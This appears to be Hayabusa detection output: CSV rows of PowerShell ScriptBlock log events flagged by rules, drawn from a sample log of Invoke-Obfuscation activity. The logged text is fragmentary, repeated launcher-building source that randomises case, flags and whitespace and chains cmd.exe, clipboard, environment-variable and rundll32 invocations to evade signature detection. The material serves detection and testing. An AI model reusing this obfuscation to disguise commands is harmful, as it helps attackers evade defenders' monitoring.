$PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). 
$PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. 
$InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. 
For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. 
$Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
